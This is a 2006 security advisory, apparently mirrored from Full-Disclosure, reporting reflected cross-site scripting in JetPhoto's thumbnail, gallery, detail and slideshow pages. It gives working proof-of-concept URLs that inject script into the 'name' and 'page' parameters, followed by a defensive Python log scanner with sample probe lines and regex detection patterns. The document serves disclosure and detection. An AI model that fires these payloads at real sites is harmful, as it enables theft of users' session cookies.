[Full-disclosure] JetPhoto Multiple Cross-Site Scripting Vulnerabilities

2006-04-11T00:00:00
ID SECURITYVULNS:DOC:12159
Type securityvulns
Reporter Securityvulns
Modified 2006-04-11T00:00:00

Description

Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilities

Author: 0o_zeus_o0 ( Arturo Z. )

Contact: zeus@diosdelared.com

Website: www.elitemexico.org

Date: 10/04/06

Risk: Medium

Vendor Url: http://www.jetphotosoft.com

Affected Software: JetPhoto

Non Affected:

Info:

This bug consists of inserting script into the request URL of the affected system; the script is reflected into the page and can be used to steal the user's cookie.

Example XSS:

http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert(document.cookie);</script>

http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>

http://www.vuln.com/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>

http://www.vuln.com/[path]/view/Classic.view/detail.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>

http://www.vuln.com/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert(document.cookie);</script>

http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert(document.cookie);</script>

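Detection logic a defender can run over web server access logs to spot probes of the view scripts and parameters listed above. This is an added example written for this listing, not JetPhoto code; it assumes the Apache/nginx combined log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# View scripts and parameters named in the advisory.
JETPHOTO_SCRIPTS = {"thumbnail.php", "gallery.php", "detail.php", "slideshow.php"}
WATCHED_PARAMS = {"name", "page"}
# Markers of injected markup once the value is URL-decoded.
SCRIPT_MARKERS = re.compile(r"<\s*/?\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE)
# Apache/nginx combined log format (only the fields we need are captured).
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def inspect_request(target):
    """Return (script, param, decoded_value) if the request looks like a probe
    of a JetPhoto view script, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if "/view/" not in parts.path or script not in JETPHOTO_SCRIPTS:
        return None
    # parse_qs decodes once; decode once more so double-encoded %253C is caught too.
    for param, values in parse_qs(parts.query, keep_blank_values=True).items():
        if param in WATCHED_PARAMS:
            for value in values:
                decoded = unquote(value)
                if SCRIPT_MARKERS.search(decoded):
                    return script, param, decoded
    return None

def scan_log(lines):
    """Return (ip, timestamp, script, param, payload) for each suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m is None:
            continue
        finding = inspect_request(m.group("target"))
        if finding is not None:
            hits.append((m.group("ip"), m.group("ts")) + finding)
    return hits

# Constructed sample lines: two probes, one normal request, one unrelated script.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2006:12:00:01 +0000] "GET /album/view/Classic.view/thumbnail.php'
    '?name=webalbum&page=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Apr/2006:12:00:02 +0000] "GET /album/view/Classic.view/gallery.php'
    '?name=JetPhoto_Album&page=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Apr/2006:12:00:03 +0000] "GET /album/view/Orange.view/slideshow.php'
    '?name=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Apr/2006:12:00:04 +0000] "GET /index.php?page=%3Cscript%3E HTTP/1.1" 404 0 "-" "curl/7.15"',
]

if __name__ == "__main__":
    for ip, ts, script, param, payload in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {script} {param}={payload!r}")
```

Only requests whose path contains /view/ and ends in one of the advisory's scripts are inspected, so the unrelated index.php probe is ignored; the double-encoded slideshow.php request is still flagged.
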
Solution:

VULNERABLE VERSIONS

all

Contact information

0o_zeus_o0

zeus@diosdelared.com

www.elitemexico.org

greetz: lady fire, Mi beba, olimpus klan team and elitemexico

original advisory: http://www.elitemexico.org/11.txt